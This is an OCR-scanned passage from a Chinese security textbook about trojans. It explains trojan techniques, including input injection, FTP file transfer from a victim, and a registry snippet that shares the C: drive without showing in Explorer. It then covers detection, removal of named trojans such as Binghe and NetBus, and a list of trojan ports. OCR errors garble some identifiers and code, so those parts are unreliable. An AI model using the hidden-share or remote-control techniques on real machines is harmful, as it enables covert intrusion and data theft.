击 某 一 主键 或 次 级 主键 时 ,右边 窗 格 中 显示 的 是 所 选 主键 内 包含 的 一 个 或 多 个 键 值 CValue) 。 

键 值 由 键 值 名 称 (Vaule Name) 和 数据 (Value Date) 组 成 ,这 就 是 右 窗 口中 的 两 个 列表 
(名 称 \ 数 据 ) 所 表示 的 。 主 键 中 可 以 包含 多 级 的 次 级 主键 ,注册 表 中 的 信息 就 是 按照 多 级 的 
层次 结构 组 织 的 。 每 个 分 支 中 保存 计算 机 系统 软件 或 硬件 之 中 某 一 方面 的 信息 与 数据 。 

注册 表 通 过 键 和 子 键 来 管理 各 种 信息 。 但 是 注册 表 中 的 所 有 信息 都 是 以 各 种 形式 的 键 
值 项 数据 保存 的 。 在 注册 表 编 辑 器 右 窗 格 中 显示 的 都 是 键 值 项 数据 。 这 些 键 值 项 数据 可 以 
分 为 3 种 类 型 。 

(1) 字符 串 值 : 在 注册 表 中 ,字符 串 值 一 般 用 来 表示 文件 的 描述 和 硬件 的 标识 。 通 常 
由 字母 和 数字 组 成 ,也 可 以 是 汉字 ,最 大 长 度 不 能 超过 255 个 字符 。 

(2) 二 进 制 值 : 在 注册 表 中 二 进 制 值 是 没有 长 度 限制 的 ,可 以 是 任意 字 节 长 。 在 注册 
表 编 辑 器 中 ,二 进 制 以 十 六 进 制 的 方式 表示 。 

(3) DWORD 值 : 该 值 是 一 个 32 位 (4 字 节 ) 的 数值 。 在 注册 表 编 辑 器 中 也 是 以 十 六 进 
制 的 方式 表示 。 

对 于 木马 等 应 用 程序 ,需要 调用 API 函数 来 操作 注册 表 。API (Application 
Programing Interface) 是 Windows 提供 的 一 个 32 位 环境 下 的 应 用 程序 编程 接口 ,其 中 包括 
了 众多 的 函数 ,提供 了 相当 丰富 的 功能 。 在 编制 应 用 程序 时 ,可 以 调用 其 中 的 注册 表 函 数 来 
对 注册 表 进 行 操作 以 实现 我 们 需要 的 功能 。 

3. 远程 屏幕 抓 取 

如 果 想 知道 目标 机 用 户 目 前 在 干什么 ,木马 程序 就 必须 达到 控制 目标 机 的 目的 。 要 知 
道 被 攻击 者 正在 干什么 ,通常 有 两 种 方式 : 第 一 种 是 记录 目标 机 的 键盘 和 鼠标 事件 ,形成 一 
个 文本 文件 ,然后 把 该 文件 发 送 到 控制 端 ,最 后 ,控制 端 可 以 通过 查看 文件 的 方式 了 解 被 控 
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制 端的 动作 。 第 二 种 方式 是 在 被 控制 端 抓 取 当前 屏幕 ,形成 一 个 位 图 文件 ,然后 把 该 文件 发 
送 到 控制 端 计算 机 并 显示 出 来 。 这 种 方式 非常 像 一 个 远程 控制 软件 (PC Anywhere) 。 

实现 远程 屏幕 抓 取 功 能 是 木马 的 一 个 必 备 技巧 。 屏 幕 抓 取 功 能 的 实现 比较 复杂 ,牵涉 
面 比较 广 ,如 内 存 管理 技术 .图 形 存 取 技 术 和 图 像 压 缩 传输 技术 等 。 本 书 就 不 作 详细 介 
绍 了 。 

4. 输入 设备 控制 

在 木马 程序 中 ,木马 使 用 者 可 以 通过 网 络 控制 目标 机 的 鼠标 和 键盘 ,以 达到 模拟 鼠标 和 
键盘 的 功能 ,也 可 以 通过 这 种 方式 启动 或 关闭 被 控制 端的 应 用 程序 。 这 里 将 介绍 编写 程序 
控制 计算 机 鼠标 和 键盘 的 基本 知识 。 模 拟 键盘 用 Keybd_event API 函数 ,模拟 鼠标 按键 用 
mouse_event 函数 。 在 VC 中 调用 API 函数 是 既 简单 又 方便 的 事 。 下 面 以 VC++ 为 例 介 绍 
如 何 实现 这 两 个 功能 。 

首先 介绍 Keybd_event 函数 。Keybd_event 能 触发 一 个 按键 事件 ,也 就 是 说 会 产生 一 
个 WM_KEYDOWN 或 WM_KEYUP 消息 。 当 然 也 可 以 用 产生 这 两 个 消息 的 方法 来 模拟 
按键 ,但 是 没有 直接 用 这 个 函数 方便 。Keybd_event 共有 4 个 参数 ,第 一 个 为 按键 的 虚拟 键 
值 , 如 Enter 键 为 vk_return,tab 键 为 vk_tab。 第 二 个 参数 为 扫描 码 ,一 般 不 用 设置 ,用 0 代 
蔡 就 行 。 第 三 个 参数 为 选项 标志 ,如 果 为 keydown 则 设置 为 0 即 可 ,如 果 为 keyup 则 设置 
成 KEYEVENTF_KEYUP。 第 四 个 参数 一 般 也 是 设置 为 0 即 可 。 用 如 下 代码 即 可 实现 模 
拟 按 下 键 的 功能 ,其 中 第 一 个 参数 表示 被 模拟 键 的 虚拟 键 值 ,在 这 里 也 就 是 各 键 对 应 的 键 
码 ,如 'A'==65。 


keybd_event (65,0,0,0); 
keybd_event (65, 0, KEYEVENTEF_KEYUP, 0); 


mouse_event 最 好 配合 SetCursorPos(x,y) 函 数 一 起 使 用 ,与 Keybd_event 类 似 ,mouse 
_event 有 5 个 参数 ,第 一 个 为 选项 标志 ,为 MOUSEEVENTF_LEFTDOWN 时 表示 左 键 按 
下 ,为 MOUSEEVENTF_LEFTUP 表示 左 键 松 开 ,向 系统 发 送 相 应 消息 。 第 二 和 第 三 个 参 
数 分 别 表示 x、y 相对 位 置 ,一般 可 设置 为 (0,0)。 第 四 和 第 五 个 参数 并 不 重要 ,一 般 也 可 设 
置 为 (0,0)。 若 要 得 到 mouse_event 函数 更 详细 的 用 法 可 参考 MSDN。 下 面 是 关于 mouse_ 
event 的 示例 代码 。 


POINT lpPoint; 

GetCursorPos(&lpPoint); 

SetCursorPos( lpPoint. x, lpPoint.y); 
mouse_event (MOUSEEVENTF_LEFTDOWN, 0, 0,0,0); 
mouse_event (MOUSEEVENTEF_LEFTUP, 0,0,0,0); 


上 面 的 代码 表示 鼠标 的 双击 , 若 要 表示 单 击 , 用 两 个 mouse_event 即 可 (一 次 按 下 ,一 次 
松 开 )。 注 意 ,不管 是 模拟 键盘 还 是 鼠标 事件 ,都 要 注意 还 原 , 即 单 击 后 要 松 开 , 一 个 
keydown 对 应 一 个 keyup。 鼠 标 单 击 完 也 要 松 开 ,不然 可 能 影响 程序 的 功能 。 

5. 远程 文件 管理 


木马 程序 操作 目标 机 文件 的 方式 通常 有 两 种 : 一 种 是 共享 目标 机 的 硬盘 ,进行 任意 的 
文件 操作 , 另 一 种 是 把 自己 的 计算 机 配置 为 FTP(File Transfer Protocol, 文 件 传输 协议 ) 服 
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务 器 ,再 进行 远程 文件 的 管理 ,例如 文件 的 上 传 (把 文件 从 目标 机 传 到 控制 端 ) 与 下 载 (把 文 
件 从 控制 端 下 载 到 目标 机 )、 目 录 浏 览 .文件 删除 ,文件 更 名 .更改 文件 属性 以 及 执行 文件 等 。 
下 面 将 简单 介绍 FTP 编程 的 基本 知识 。 

要 连接 到 FTP 服务 器 ,需要 两 个 步 又。 首先 必须 创建 一 个 CInternetSession 对 象 ,用 
类 CInterSession 创建 并 初始 化 一 个 或 几 个 同时 存在 的 Internet 会 话 (Session) ,并 描述 与 代 
理 服务 器 的 连接 (如 果 有 必要 的 话 ), 如 果 在 程序 运行 期 间 需 要 保持 与 Internet 的 连接 ,可 以 
创建 一 个 CInternetSession 对 象 作 为 类 CWinApp 的 成 员 。 

MFC 中 的 类 CFtpConnection 管理 与 Internet 服务 器 的 连接 ,并 直接 操作 服务 器 上 的 
目录 和 文件 ,FTP 是 MFC 的 WinInet 支持 的 3 个 Internet 功能 之 一 ,只 要 先 创建 一 个 
CInternetSession 实例 和 一 个 CFtpConnection 对 象 就 可 以 实现 和 一 个 FTP 服务 器 的 通信 ， 
并 且 不 需要 直接 创建 CFtpConnection 对 象 , 而 是 通过 调用 CInternetSession:: GetFtp 
Connection 来 完成 这 项 工作 。 它 创建 CFtpConnection 对 象 并 返回 一 个 指向 该 对 象 的 指针 。 
下 面 首先 介绍 Ftp 连接 类 的 信息 。 

1) CInternetSession 对 象 


CInternetSession ( LPCTSTR pstrAgent, DWORD dwConText, DWORD dwAccessType, LPCTSTR 
pstrProxyName, LPCTSTR pstrProxyBypass, DWORD dwFlags) 


在 创建 CInternetSession 对 象 时 调用 这 个 成 员 函 数 ,CInternetSession 是 应 用 程序 第 一 
个 要 调用 的 Internet 函数 , 它 将 初始 化 内 部 数据 结构 ,以 备 将 来 在 应 用 程序 中 调用 。 如 果 
dwFlags 包含 INTERNET_FLAG_ASYNC, 那 么 从 这 个 句柄 派生 的 所 有 句柄 ,在 状态 回调 
例 程 注册 之 前 ,都 会 出 现 异步 状态 。 如 果 没 有 打开 Internet 连接 ,CInternetSession 就 会 抛 
出 一 个 例外 , 即 AfxThorowInternetException。 

2) GetFtpConnection() 函 数 


CFtpConnection * CIternetSession:: GetFtpConnection ( LPCTSTR pstrServer, LPCTSTR 
pstrUserName, LPCTSTR pstrPassword, INTERNET_ PORT nPort, BOOL bPassive) 


调用 这 个 函数 建立 一 个 FTP 连接 ,并 获得 一 个 指向 CFtpConnection 对 象 的 指针 ， 
GetFtpConnection 连接 到 一 个 FTP 服务 器 ,创建 并 返回 指向 CFtpConnection 对 象 的 指针 ， 
它 不 在 服务 器 上 进行 任何 操作 。 如 果 打 算 读 写 文 件 , 则 必须 进行 分 步 操作 。 关 于 查找 .打开 
和 读 写 文件 的 信息 需 参考 CFtpConnection 和 CFtpFileFind 类 。 

对 这 个 函数 的 调用 返回 一 个 指向 CFtpConnection 对 象 的 指针 。 如 果 调 用 失败 ,通过 检 
查 抛 出 的 CInternetException 对 象 ,就 可 以 确定 失败 的 原因 。 

3) GetFile() 函 数 

BOOL GetFile ( LPCTSTR pstrRemoteFile, LPCTSTR pstrLocalFile, BOOL bFailExists, DWORD dwAttributes, 

DWORD dwFlags, DWNORD dwContext) 


调用 这 个 成 员 函 数 , 可 以 从 FTP 服务 器 取得 文件 ,并 且 把 文件 保存 在 本 地 计算 机 上 。 
GetFile() 函数 是 一 个 比较 高 级 的 例 程 , 它 可 以 处 理 所 有 从 FTP 服务 器 读 文 件 以 及 把 文件 
存放 在 本 地 计算 机 上 的 有 关 工 作 。 如 果 dwFlags 为 FILE_TRANSFER_TYPE_ASCII, 文 
件数 据 的 传输 也 会 把 控制 和 格式 符 转 化 为 Windows 中 的 等 价 符号 。 默 认 的 传输 模式 是 二 
进 制 模式 ,文件 会 以 和 服务 器 上 相同 的 格式 被 下 载 。 
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pstrRemoteFile 和 pstrLocalFile 可 以 是 相对 于 当前 目录 的 部 分 文件 名 ,也 可 以 是 全 文 
件 名 ,在 这 两 个 名 称 中 间 可 以 用 反 斜 枉 (\) 或 者 正 斜 枉 (/) 来 作为 文件 名 的 目录 分 隔 符 ， 
GetFile() 在 使 用 前 会 把 目录 分 隔 符 转化 为 适当 的 字符 。 

可 以 用 自己 选择 的 值 来 取代 dwContext 默认 的 值 , 设 置 为 上 下 文 标识 符 与 
CFtpConnection 对 象 的 定位 操作 有 关 , 这 个 操作 由 CFtpConnection 中 的 CInternetSession 
对 象 创建 。 返 回 给 CInternetSession: :OnStatusCallBack 的 值 指 出 了 所 标识 操作 的 状态 。 

如 果 调 用 成 功 ,函数 的 返回 为 非 0, 和 否则 返回 为 0; 如 果 调 用 失败 ,可 以 调用 Win32 函数 
GetLastError() 确 认 出 错 的 原因 。 

4) PutFile() 函数 


BOOL PutFile(LPCTSTR pstrLocalFile, LPCTSTR pstrRemoveFile , DWORD dwFlags, DWORD dwContext) 


调用 这 个 成 员 函 数 可 以 把 文件 保存 到 FTP 服务 器 。PutFile() 函 数 是 一 个 比较 高 级 的 
例 程 , 它 可 以 处 理 把 文件 存放 到 服务 器 上 的 有 关 工 作 。 如 果 只 发 送 数据 ,或 要 严格 控制 文件 
传输 的 应 用 程序 ,应 该 调用 OpenFile 和 CInternet:: Write。 利 用 自己 选择 的 值 来 取代 
dwContext 默认 的 值 ,设置 为 上 下 文 标识 符 , 上 下 文 标识 符 是 CInternetSession 对 象 创建 
的 ,与 CFtpConnection 对 象 的 特定 操作 有 关 , 这 个 值 返 回 给 CInternetSession:: 
OnStateCallBack, 从 而 把 操作 的 状态 通报 给 它 所 标识 的 上 下 文 。 

如 果 调 用 成 功 ,函数 的 返回 为 非 0, 否 则 返回 为 0; 如 果 调 用 失败 ,可 以 调用 Win32 函数 
GetLastError() 确 认 出 错 的 原因 。 

6. 共享 硬盘 数据 

如 果木 马 程序 仅仅 是 在 目标 机 上 运行 一 些小 程序 ,占用 一 些 内 存 , 那 也 没什么 可 怕 的 。 
可 怕 的 是 它 能 使 目标 机 上 的 硬盘 数据 共享 ,暴露 目标 计算 机 上 的 所 有 资源 ,为 黑客 的 进一步 
攻击 提供 方便 。 用 户 自己 选择 了 某 个 文件 夹 并 进行 共享 之 后 ,在 “资源 管理 器 ”中 浏览 目录 
和 文件 时 ,就 会 发 现 该 文件 夹 下 有 一 个 手 一 样 的 图 标 。 但 是 木马 程序 使 硬盘 共享 后 ,在 “ 资 
源 管理 器 ”中 就 看 不 出 来 任何 痕迹 ,十 分 隐蔽 。 

在 此 ,将 介绍 如 何 通 过 程序 实现 硬盘 的 共享 ,并 且 在 “资源 管理 器 "中 不 留 痕迹 。 同 样 ， 
这 也 是 通过 修改 注册 表 实 现 的 。 


Windows 2000/NT/XP: 
[HKEY_LOCRL_MRACHINENSYSTEMNControlSet001\Services\lanmanserver\Shares] 
Windows 9x: 

[HKEY_LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan] 


在 此 添加 如 下 键 。 
"Flags" // 类 型 
"Path" // 目 录 
"Remark" // 备 注 
"Type”" 

"Parmlenc" 


"Parm2enc" 
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实现 C 盘 共 享 的 代码 片段 如 下 。 


Result = RegCreateKey(HKEY LOCAL MACHINE, CommonPath + "C:", hCurKey) 


lResult = RegSetValueEx(hCurKey, "Flags", 0&, REG_DWORD, 770&, 4) 

lResult = RegSetValueEx(hCurKey, "Type", 0&, REG_DWORD, 0&, 4) 

lResult = RegSetValueEx(hCurKey, "Path", 0&, REG SZ, Buff + "\", 6) 
lResult = RegSetValueEx(hCurKey, "Parm2enc", 0&, REG BINARY, &HEB61B41A, 4) 
lResult = RegSetValueEx(hCurKey, "Parmlenc", 0&, REG BINARY, &HEB61B41A, 4) 
lResult = RegSetValueEx(hCurKey, "Remark", 0&, REG SZ, "", 2) 


7. 服务 器 端 程序 的 包装 

熟悉 “冰河 ”病毒 的 人 都 知道 ,冰河 允许 用 户 自 定义 端口 号 。 这 样 做 的 目的 是 为 了 防止 
自己 被 反 木 马 程序 检测 出 来 ,这 种 功能 是 如 何 实现 的 呢 ? 让 我 们 来 做 一 个 实验 : 首先 随意 
找 一 个 可 执行 程序 ,假设 这 个 程序 是 Test. exe; 然后 ,建立 一 个 文本 文件 text. txt, 其 内 容 
为 “This is for test11”; 接着 ,执行 下 列 步 又 。 

进入 命令 行 模式 下 做 如 下 操作 。 

(1) 输入 “*C:\> type text. txt >> Test. exe”。 

(2) 运行 Test. exe。 

可 以 发 现 Test. exe 仍然 可 以 运行 。 那 么 ,text. txt 的 内 容 “This is for test11” 去 了 哪里 
了 呢 ? 可 以 用 一 款 较 好 的 编辑 软件 打开 Test. exe 看 看 ,原来 这 段 文字 就 在 Test. exe 文件 
的 最 后 。 木 马 服 务 器 端 自 定制 的 奥秘 就 是 首先 生成 一 个 EXE 文件 ,这 个 EXE 文件 中 有 一 
项 读 取 自 身 进程 内 容 的 操作 , 读 取 时 ,文件 的 指针 直接 指向 进程 的 末尾 ,从 末尾 的 倒数 NN 个 
字 节 处 取得 用 户 定制 的 信息 ,如 端口 号 等 ,然后 传递 给 程序 的 相关 部 分 进行 处 理 。 这 里 不 给 
出 相关 的 代码 部 分 ,有 兴趣 的 读者 请 参考 一 些 文件 打包 程序 代码 ,它们 所 使 用 的 技术 是 大 同 
小 异 的 。 


5.4 木马 防范 技术 


5.4.1 防治 特洛伊 木马 基本 知识 


知道 了 木马 的 工作 原理 , 查 杀 木马 就 变 得 相对 容易 了 。 如 果 发 现 有 木马 存在 ,最 安全 也 
是 最 有 效 的 方法 就 是 马上 将 计算 机 与 网 络 断 开 ,防止 黑客 通过 网 络 对 计算 机 进行 攻击 。 然 
后 再 进行 必要 的 检查 和 杀 除 工作 。 

1. 感染 木马 的 现象 

如 果 计 算 机 有 以 下 表现 ,就 很 可 能 染 上 木马 了 。 计 算 机 有 时 死机 ,有 了 时 又 重新 启动 ; 在 
没有 执行 什么 操作 的 时 候 , 却 在 拼命 读 写 硬盘 ; 系统 莫名 其 妙 地 对 软驱 进行 搜索 ; 没有 运 
行 大 的 程序 ,而 系统 的 速度 却 越 来 越 慢 , 系 统 资源 占用 很 多 。 特 别 是 在 连 入 Internet 网 或 是 
局 域 网 后 ,如 果 计 算 机 有 这 些 现象 ,就 应 该 小 心 了 ,当然 也 有 可 能 是 一 些 其 他 的 病毒 在 作怪 。 
木马 程序 的 破坏 通常 需要 里 应 外 合 , 大 多 数 的 木马 不 如 病毒 般 可 怕 。 即 使 运行 了 ,也 不 一 定 
会 对 计算 机 造成 危害 。 不 过 ,潜在 的 危害 还 是 有 的 。 例 如 ,用 户 的 上 网 密码 有 可 能 已 经 在 别 
人 的 收 件 箱 里 了 。 
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2. 发 现 和 杀 除 木马 的 方法 

(1) 端口 扫描 。 端 口 扫 描 是 检查 远程 计算 机 有 无 木马 的 最 好 办 法 , 它 的 原理 非常 简单 ， 
扫描 程序 尝试 连接 某 个 端口 ,如果 成 功 , 则 说 明 端口 开放 ,如 果 失 败 或 超过 某 个 特定 的 时 间 
(超时 ), 则 说 明 端 口 关闭 。 但 是 值得 说 明 的 是 ,对 于 驱动 程序 /动态 链接 木马 ,扫描 端口 是 不 
起 作用 的 。 

(2) 查看 连接 。 查 看 连接 和 端口 扫描 的 原理 基本 相同 ,不 过 是 在 本 地 机 上 通过 netstat-a 
(或 某 个 第 三 方 的 程序 ) 查 看 所 有 的 TCP/ UDP 连接 ,查看 连接 要 比 端口 扫描 快 ,缺点 同样 是 无 
法 查 出 驱动 程序 和 动态 链接 木马 ,而 且 仅仅 能 在 本 地 使 用 。 

(3) 检查 注册 表 。 在 讨论 木马 的 启动 方式 时 已 经 提 到 ,木马 可 以 通过 注册 表 启 动 (现在 
大 部 分 的 木马 都 是 通过 注册 表 启 动 的 ,至 少 也 把 注册 表 作 为 一 个 自我 保护 的 方式 ) ,那么 , 同 
样 可 以 通过 检查 注册 表 来 发 现 木 马 ,“ 冰 河 ” 在 注册 表 里 留 下 的 痕迹 请 参照 后 续 章 节 内 容 。 

(4) 查找 文件 。 查 找 木 马 特定 的 文件 也 是 一 个 常用 的 方法 。“ 冰 河 ” 的 一 个 特征 文件 是 
kernl32. exe( 伪 装 成 Windows 的 内 核 ) , 另 一 个 更 隐蔽 的 文件 是 sysexplr. exe( 伪 装 成 超级 
解 霸 程 序 )。 “冰河 ? 之 所 以 给 这 两 个 文件 定义 这 样 的 名 称 就 是 为 了 更 好 地 伪装 自己 ,只 要 删 
除了 这 两 个 文件 ,冰河 就 不 起 作用 了 。 其 他 的 木马 也 是 一 样 。 对 于 “冰河 ”木马 ,如 果 只 是 删 
除了 sysexplr. exe 而 没有 做 扫尾 工作 ,可 能 会 遇 到 一 些 麻烦 ,例如 ,文本 文件 打 不 开 了 ,原因 
是 sysexplr. exe 是 和 文本 文件 关联 的 ,还 必须 把 文本 文件 跟 notepad 关联 上 。 

(5) 杀 病 毒 软件 。 对 于 新 出 现 的 木马 , 杀 病 毒 软件 没有 太 大 的 作用 ,包括 一 些 号 称 专 杀 
木马 的 软件 同样 如 此 。 不 过 对 于 过 时 的 木马 以 及 水 平 较 差 的 木马 还 是 有 点 用 处 的 ,值得 一 
提 的 是 Iparmor。 这 个 软件 在 这 一 方面 可 以 称 得 上 是 比较 领先 的 , 它 采 用 了 监视 动态 链接 
库 的 技术 ,可 以 监视 所 有 调用 Winsock 的 程序 ,并 可 以 动态 杀 除 进程 ,是 一 个 个 人 防御 的 好 
工具 5 

(6) 系统 文件 检查 器 。 另 外 ,对 于 驱动 程序 和 动态 链接 库 木 马 ,有 一 种 方法 可 以 尝试 ， 
即使 用 Windows 的 “系统 文件 检查 器 "。 它 可 检测 操作 系统 文件 的 完整 性 ,如 果 这 些 文件 损 
坏 ,检查 器 可 以 将 其 还 原 , 并 且 还 可 以 从 安装 盘 中 解压 缩 已 压缩 的 文件 (如 驱动 程序 ) 。 如 果 
驱动 程序 或 动态 链接 库 在 没有 升级 的 情况 下 被 改动 了 ,就 有 可 能 是 木马 (或 者 损坏 了 ) 造 成 
的 ,替换 改动 过 的 文件 可 以 保证 系统 的 安全 和 稳定 。 


各 注意 

(1) 如 果木 马 正 在 运行 , 则 无 法 删除 其 程序 ,这 时 可 以 重启 动 到 DOS 方式 然后 将 其 删除 。 

(2) 有 的 木马 会 自动 检查 其 在 注册 表 中 的 自 启动 项 ,如 果 是 在 木马 处 于 活动 时 删除 该 
项 它 能 自动 恢复 ,这 时 可 以 重启 到 DOS 下 将 其 程序 删除 后 再 进入 Windows 下 将 其 注册 表 
中 的 自 启 动 项 删除 。 

(3) 在 进行 删除 操作 和 注册 表 修 改 操作 前 一 定 要 先 备 份 。 

3. 木马 的 预防 措施 

如 何 防止 再 次 中 木马 程序 呢 ? 这 里 作者 给 出 一 些 防 范 后 门 的 经 验 。 

(1) 永远 不 要 执行 任何 来 历 不 明 的 软件 或 程序 ,除非 确信 自己 的 计算 机 水 平 达到 了 百 
毒 不 侵 的 地 步 。 谨 慎 对 待 就 是 下 载 后 先 用 杀毒 软件 检查 一 遍 ,确定 没有 问题 后 再 执行 和 使 
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用 。 许多 网 友 就 是 懒得 进行 这 几 秒 钟 的 检查 , 才 中 木马 的 。 轻 则 被 侵入 者 删 了 系统 文件 , 重 
装 系统 , 重 则 数据 全 无 ,甚至 被 人 破译 上 网 账号 。 

(2) 永远 不 要 相信 自己 的 邮箱 不 会 收 到 垃圾 邮件 和 病毒 ,即使 自己 的 邮箱 或 ISP 邮箱 
从 未 露面 ,有 些 时 候 永 远 没 办 法 知道 别人 如 何 得 知 自 己 的 E-mail 地址 的 。 

(3) 永远 不 要 因为 对 方 是 你 的 好 朋友 就 轻易 执行 他 发 过 来 的 软件 或 程序 ,因为 你 不 确 
信 他 是 否 装 上 了 病毒 防火 墙 ,也 许 你 的 朋友 中 了 黑客 程序 但 还 不 知道 ,同时 ,你 也 不 能 确保 
是 否 有 别人 冒 他 的 名 给 你 发 E-mail。 

(4) 千 万 不 要 随便 留 下 个 人 资料 ,因为 不 知道 是 否 有 人 会 处 心 积 虑 将 它 收集 起 来 。 

(5) 千 万 不 要 轻易 相信 网 络 上 认识 的 新 朋友 ,因为 在 网 络 上 ,对 方 都 是 虚拟 存在 的 ,你 
不 能 保证 对 方 是 否 想 利用 你 做 实验 品 。 

(6) 永远 不 要 以 为 网 络 上 谁 也 不 认识 谁 就 出 言 不 逊 ,这 样 会 不 小 心 惹 恼 某 些 可 能 会 侵 
犯 你 计算 机 系统 的 黑客 。 


5s.4.2 几 种 常见 木马 病毒 的 杀 除 方法 


1. BO2000 

查看 注册 表 [LHEKY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\ 
RunServicse] 中 是 否 存在 Umgr32. exe 的 键 值 。 有 则 将 其 删除 。 重新 启动 计算 机 ,并 将 
\Windows\System 中 的 Umgr32. exe 删除 。 

2. NetSpy( 网 络 精灵 ) 

国产 木马 ,默认 连接 端口 为 7306 。 在 该 版 本 中 新 添加 了 注册 表 编 辑 功能 和 浏览 器 监控 
功能 ,客户 端 现在 可 以 不 用 NetMonitor ,通过 IE 或 Navigate 就 可 以 进行 远程 监控 了 。 其 强 
大 之 处 丝毫 不 逊色 于 冰河 和 BO2000。 服 务 端 程序 被 执行 后 ,会 在 C:\Windows\System 目 
录 下 生成 netspy. exe 文件 。 同 时 在 注册 表 [ HKEY _LOCAL_MACHINE\ Software\ 
Microsoft\Windows\CurrentVersion\Run] 下 建立 键 值 C:\windows\system\netspy. exe， 
用 于 在 系统 启动 时 自动 加 载运 行 。 

NetSpy 的 清除 方法 如 下 。 

(1) 进入 DOS, 在 C:\Windows\System\ 目 录 下 输入 命令 “del netspy. exe” 并 按 
Enter 键 。 

(2) 进入 注册 表 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current 
VersionYRun ,删除 Netspy. exe 和 Spynotify. exe 的 键 值 即 可 安全 清除 NetSpy。 

3. NetBus( 网 络 公牛 ) 

国产 木马 ,默认 连接 端口 为 2344。 服 务 端 程序 newserver. exe 运行 后 ,会 自动 脱 壳 成 
checkdll. exe, 位 于 C:\WINDOWS\SYSTEM 下 ,下 次 开机 checkdll. exe 将 自动 运行 ,因此 
很 隐蔽 ,危害 很 大 。 同 时 ,服务 端 运行 后 会 自动 捆绑 以 下 文件 。 

(1) Windows 9x 下 : 捆绑 notepad. exe、write. exe、regedit. exe、winmine. exe、winhelp. exe。 

(2) Windows NT/Windows 2000 下 : 捆绑 notepad. exe、 regedit. exe、 reged32. exe、 


drwtsn32. exe winmine. exe。 


服务 端 运行 后 还 会 捆绑 在 开机 时 自动 运行 的 第 三 方 软件 (如 realplay. exe、QQ、ICQ 
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等 ) 上 。 在 注册 表 中 网 络 公牛 也 悄悄 地 扎 下 了 根 。 


[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] 
"CheckD11. exe" = "C:\WINDOWS\SYSTEM\CheckD11. exe" 

[HKEY_LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices] 
"CheckD11. exe" = "C:\WINDOWS\SYSTEM\CheckD]11. exe" 

[HKEY_USERS\. DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run] 
"CheckD11. exe" = "C:\WINDOWS\SYSTEM\CheckD11. exe" 


网 络 公牛 没有 采用 文件 关联 功能 ,而 是 采用 文件 捆绑 功能 ,和 上 面 所 列 出 的 文件 捆绑 在 
一 块 , 要 清除 非常 困难 。 

NetBus 的 清除 方法 如 下 。 

(1) 删除 网 络 公 牛 的 自 启动 程序 C:\WINDOWS\SYSTEM\CheckDIl. exe。 

(2) 把 网 络 公牛 在 注册 表 中 所 建立 的 键 值 全 部 删除 (上 面 所 列 出 的 那些 键 值 全 部 删除 ) 。 

(3) 检查 上 面 列 出 的 文件 ,如 果 发 现 文件 长 度 发 生变 化 (增加 了 40KB 左右 ,可 以 通过 
与 其 他 计算 机 上 的 正常 文件 比较 而 知 ) ,就 删除 它们 。 然 后 选择 “开始 ”附件 ”一 “系统 工 
具 ” 一 “系统 信息 ”一 “工具” 一 “系统 文件 检查 器 ”命令 ,在 弹出 的 对 话 框 中 选中 “从 安装 软盘 
提取 一 个 文件 ”, 在 文本 框 中 输入 要 提取 的 文件 (前 面 删 除 的 文件 ) , 单 击 “ 确 定 ” 按 钮 ,然后 按 
屏幕 提示 将 这 些 文件 恢复 即 可 。 如 果 是 开机 时 自动 运行 的 第 三 方 软件 ,如 realplay. exe、 
QQ ICQ 等 被 捆绑 上 了 , 那 就 得 把 这 些 软件 印 载 ,再 重新 安装 。 

4. Asylum 

Asylum 木马 程序 修改 了 system. ini 和 win. ini 两 个 文件 , 先 查 一 下 system. ini 文件 下 
面 的 [BOOT]J 项 ,看 看 是 否 存 在 “shell 二 explorer. exe”, 如 不 是 则 删除 它 , 改 回 上 面 的 设置 ， 
并 记 下 原来 的 文件 名 以 便 在 纯 DOS 下 删除 它 。 再 打开 win. ini 文件 ,看 在 Lwindows] 项 下 
的 "run 一 ”是 不 是 有 什么 文件 名 ,一 般 情况 下 是 没有 任何 加 载 值 的 ,如 果 有 则 记 下 它 ,以 便 在 
纯 DOS 下 删除 相应 的 文件 名 。 

5. 冰河 

“冰河 ”标准 版 的 服务 器 端 程序 为 G-server. exe, 客 户 端 程序 为 G-client. exe, 上 默认 连接 
端口 为 7626。 一 旦 运行 G-server, 那 么 该 程序 就 会 在 C:\Windows\system 目录 下 生成 
kernel32. exe 和 sysexplr. exe 并 删除 自身 。kernel32. exe 在 系统 启动 时 自动 加 载运 行 ， 
sysexplr. exe 和 TXT 文件 关联 ,即使 删除 了 kernel32. exe, 但 只 要 打开 TXT 文件 ， 
sysexplr. exe 就 会 被 激活 , 它 将 再 次 生成 kernel32. exe, 于 是 “冰河 ”又 回来 了 。 这 就 是 “ 冰 
河 ” 屡 删 不 止 的 原因 。 

“冰河 ”的 清除 方法 为 : 用 纯 DOS 启动 系统 (以 防 木马 的 自动 恢复 ) 删 除 安装 的 
Windows 下 的 system\kernel32. exe 和 system\sysexplr. exe 两 个 木马 文件 ,注意 如 果 系 统 
提示 不 能 删除 它们 ,是 因为 木马 程序 自动 设置 了 这 两 个 文件 的 属性 ,只 需 先 改 掉 它 们 的 隐 
藏 、 只 读 属性 ,就 可 以 将 其 删除 。 

删除 后 ,进入 Windows 系统 的 注册 表 中 ,找到 [LHKEY_LOCAL_MACHINE\SOFT 
WARE\ Microsoft\ Windows\ CurrentVersion \ Run | 和 [HKEY _LOCAL_MACHINE\ 
SOFTWARE \Microsoft\ Windows\CurrentVersion\RunServices] 两 项 ,然后 查找 kernel32. exe 
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和 sysexplr. exe 两 个 键 值 并 删除 。 再 找到 [HKEY_CLASSES_ROOT\txtfile\open\command]， 
看 键 值 是 不 是 已 改 为 “sysexplr. exe%1”, 如 果 是 则 改 回 “notepad. exe %1”。 


5.4.3 已 知 木马 病毒 的 端口 列表 
已 知 木 马 病毒 的 端口 列表 如 表 5-2 所 示 。 


表 5-2 已 知 木 马 病毒 的 端口 


木马 名 称 端 口 木马 名 称 端 口 
BO jammerkillahV 121 Deep Throat 2140 
NukeNabber 139 Ther Invasor 2140 
Hackers Paradise 456 RVL Rat5 2283 
Stealth Spy 555 Striker 2565 
Phase0 555 Wincrash2 2583 
NeTadmin 555 The Prayer 2716 
Satanz Backdoor 666 Phineas 2801 
Attack FTP 666 Portal of Doom 3700 
AIMSpy 28 Total Eclypse 3791 
